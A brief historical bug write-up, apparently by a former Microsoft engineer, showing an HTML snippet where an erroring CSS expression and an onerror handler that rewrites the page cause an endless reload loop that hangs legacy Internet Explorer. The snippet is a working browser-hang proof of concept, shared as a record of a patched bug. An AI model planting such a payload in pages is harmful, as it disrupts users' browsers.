A CSS expression that throws a JavaScript error, combined with an onerror handler that writes a page reload script, creates an infinite loop that hangs the browser.

<a style="color: expression(if (!window.a) (window.b=123));" href="http://www.bing.com">Bing</a>

<script>
window.onerror = function() {
    document.write("<script>location.search = '?RND=' + Math.random()<\/script>");
    document.close();
    return true;
}
</script>

The CSS expression fires an error on evaluation, the onerror handler rewrites the page with a location change, the new page loads the same markup, and the cycle repeats indefinitely. Tested in IE8 emulation mode on IE10 / IE11 build 20130312-2100.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.